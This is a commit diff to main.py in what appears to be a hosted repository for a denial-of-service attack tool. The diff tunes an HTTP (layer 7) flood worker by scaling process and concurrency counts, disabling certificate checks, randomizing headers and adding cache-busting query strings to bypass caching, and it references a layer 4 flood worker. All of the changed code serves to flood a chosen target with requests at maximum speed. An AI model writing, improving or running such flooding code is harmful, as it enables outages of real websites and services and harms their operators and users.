Samuraiog commited on
Commit
85cc1f8
·
verified ·
1 Parent(s): 3cb8265

Update main.py

Browse files
Files changed (1) hide show
  1. main.py +50 -36
main.py CHANGED
@@ -35,26 +35,24 @@ app = FastAPI(
35
  CPU_COUNT = psutil.cpu_count(logical=True) or 8
36
  TOTAL_RAM_GB = psutil.virtual_memory().total / (1024 ** 3)
37
 
38
- # Auto-tune based on system resources
39
- if CPU_COUNT <= 4:
40
- MAX_PROCESSES = CPU_COUNT * 4
41
- MAX_CONCURRENCY_PER_PROCESS = 512
42
- elif CPU_COUNT <= 8:
43
- MAX_PROCESSES = CPU_COUNT * 8 # 8 cores = 64 processes
44
- MAX_CONCURRENCY_PER_PROCESS = 1024
45
- elif CPU_COUNT <= 16:
46
  MAX_PROCESSES = CPU_COUNT * 6
47
- MAX_CONCURRENCY_PER_PROCESS = 768
48
- else:
49
- MAX_PROCESSES = CPU_COUNT * 4
 
50
  MAX_CONCURRENCY_PER_PROCESS = 512
51
-
52
- # Adjust for low RAM systems
53
- if TOTAL_RAM_GB < 8:
54
  MAX_CONCURRENCY_PER_PROCESS = 256
55
- MAX_PROCESSES = min(MAX_PROCESSES, CPU_COUNT * 4)
56
 
57
- STATS_BATCH_UPDATE_SIZE = 1000 # Larger batches
58
  TOTAL_WORKERS = MAX_PROCESSES * MAX_CONCURRENCY_PER_PROCESS
59
 
60
  # --- L7 Enhanced Headers Pool ---
@@ -249,60 +247,76 @@ def l4_worker_process(stop_event, shared_counter, target_ip, port, attack_type,
249
  # OPTIMIZED L7 WORKER PROCESS
250
  # ====================================================================================
251
  async def l7_worker_main(url, method, concurrency, stop_event, shared_counter):
252
- """Ultra-aggressive L7 worker with connection pooling and minimal timeouts."""
253
  ssl_context = ssl.create_default_context()
254
  ssl_context.check_hostname = False
255
  ssl_context.verify_mode = ssl.CERT_NONE
256
 
257
- # Maximum throughput connector settings
258
  connector = aiohttp.TCPConnector(
259
- limit=0, # Unlimited connections
260
- limit_per_host=0, # No per-host limit
261
  ttl_dns_cache=300,
262
  force_close=False, # Reuse connections
263
  enable_cleanup_closed=True,
264
  keepalive_timeout=30
265
  )
266
 
267
- # Aggressive timeouts
268
- timeout = aiohttp.ClientTimeout(total=5, connect=2, sock_read=2)
269
 
270
  async with aiohttp.ClientSession(connector=connector, timeout=timeout) as session:
271
- async def task_worker():
272
  """Individual task worker - sends requests continuously."""
273
  local_counter = 0
 
 
274
  while not stop_event.is_set():
275
  try:
276
  # Random query string to bypass caching
277
- cache_buster = f"?_={random.randint(1, 999999999)}"
 
 
278
  async with session.request(
279
- method,
280
  f"{url}{cache_buster}",
281
  headers=get_random_headers(),
282
- allow_redirects=False
 
283
  ) as response:
284
- # Don't wait for full response - just status
285
- _ = response.status
286
- local_counter += 1
287
- except:
288
- # Count failures too for accurate metrics
289
- local_counter += 1
 
 
 
 
 
 
 
 
 
 
 
 
290
  finally:
291
  # Batch updates for performance
292
  if local_counter >= STATS_BATCH_UPDATE_SIZE:
293
  with shared_counter.get_lock():
294
  shared_counter.value += local_counter
295
  local_counter = 0
296
- # Minimal yield
297
- await asyncio.sleep(0)
298
 
299
  # Final update
300
  if local_counter > 0:
301
  with shared_counter.get_lock():
302
  shared_counter.value += local_counter
303
 
304
- # Launch all concurrent tasks
305
- tasks = [asyncio.create_task(task_worker()) for _ in range(concurrency)]
306
  await asyncio.gather(*tasks, return_exceptions=True)
307
 
308
  def l7_worker_process(stop_event, shared_counter, target_ip, port, path, method, concurrency):
 
35
  CPU_COUNT = psutil.cpu_count(logical=True) or 8
36
  TOTAL_RAM_GB = psutil.virtual_memory().total / (1024 ** 3)
37
 
38
+ # Optimized for SUSTAINED performance (not burst)
39
+ # More processes, lower concurrency = better sustained RPS
40
+ if CPU_COUNT >= 32:
41
+ # High-core systems (32-64+ cores)
42
+ MAX_PROCESSES = min(CPU_COUNT * 4, 256)
43
+ MAX_CONCURRENCY_PER_PROCESS = 256 # Lower for stability
44
+ elif CPU_COUNT >= 16:
 
45
  MAX_PROCESSES = CPU_COUNT * 6
46
+ MAX_CONCURRENCY_PER_PROCESS = 384
47
+ elif CPU_COUNT >= 8:
48
+ # 8-core systems (like yours)
49
+ MAX_PROCESSES = CPU_COUNT * 12 # 96 processes
50
  MAX_CONCURRENCY_PER_PROCESS = 512
51
+ else:
52
+ MAX_PROCESSES = CPU_COUNT * 8
 
53
  MAX_CONCURRENCY_PER_PROCESS = 256
 
54
 
55
+ STATS_BATCH_UPDATE_SIZE = 500 # Smaller batches for accurate counting
56
  TOTAL_WORKERS = MAX_PROCESSES * MAX_CONCURRENCY_PER_PROCESS
57
 
58
  # --- L7 Enhanced Headers Pool ---
 
247
  # OPTIMIZED L7 WORKER PROCESS
248
  # ====================================================================================
249
  async def l7_worker_main(url, method, concurrency, stop_event, shared_counter):
250
+ """Optimized L7 worker for sustained high RPS."""
251
  ssl_context = ssl.create_default_context()
252
  ssl_context.check_hostname = False
253
  ssl_context.verify_mode = ssl.CERT_NONE
254
 
255
+ # Balanced connector settings for sustained throughput
256
  connector = aiohttp.TCPConnector(
257
+ limit=concurrency * 2, # 2x concurrency for connection pool
258
+ limit_per_host=concurrency,
259
  ttl_dns_cache=300,
260
  force_close=False, # Reuse connections
261
  enable_cleanup_closed=True,
262
  keepalive_timeout=30
263
  )
264
 
265
+ # Balanced timeouts
266
+ timeout = aiohttp.ClientTimeout(total=10, connect=3, sock_read=5)
267
 
268
  async with aiohttp.ClientSession(connector=connector, timeout=timeout) as session:
269
+ async def task_worker(worker_id):
270
  """Individual task worker - sends requests continuously."""
271
  local_counter = 0
272
+ consecutive_errors = 0
273
+
274
  while not stop_event.is_set():
275
  try:
276
  # Random query string to bypass caching
277
+ cache_buster = f"?_t={int(time.time() * 1000)}&_r={random.randint(1, 999999)}"
278
+
279
+ # Use the specified HTTP method
280
  async with session.request(
281
+ method.upper(),
282
  f"{url}{cache_buster}",
283
  headers=get_random_headers(),
284
+ allow_redirects=False,
285
+ timeout=timeout
286
  ) as response:
287
+ # Read just the status - count only successful requests
288
+ if response.status < 500: # Count all non-server-error responses
289
+ local_counter += 1
290
+ consecutive_errors = 0
291
+ else:
292
+ consecutive_errors += 1
293
+
294
+ except (asyncio.TimeoutError, aiohttp.ClientError):
295
+ consecutive_errors += 1
296
+ # Back off if too many errors
297
+ if consecutive_errors > 5:
298
+ await asyncio.sleep(0.05)
299
+ consecutive_errors = 0
300
+ except Exception:
301
+ consecutive_errors += 1
302
+ if consecutive_errors > 5:
303
+ await asyncio.sleep(0.05)
304
+ consecutive_errors = 0
305
  finally:
306
  # Batch updates for performance
307
  if local_counter >= STATS_BATCH_UPDATE_SIZE:
308
  with shared_counter.get_lock():
309
  shared_counter.value += local_counter
310
  local_counter = 0
311
+ # No sleep - maximum speed
 
312
 
313
  # Final update
314
  if local_counter > 0:
315
  with shared_counter.get_lock():
316
  shared_counter.value += local_counter
317
 
318
+ # Launch all concurrent tasks with IDs
319
+ tasks = [asyncio.create_task(task_worker(i)) for i in range(concurrency)]
320
  await asyncio.gather(*tasks, return_exceptions=True)
321
 
322
  def l7_worker_process(stop_event, shared_counter, target_ip, port, path, method, concurrency):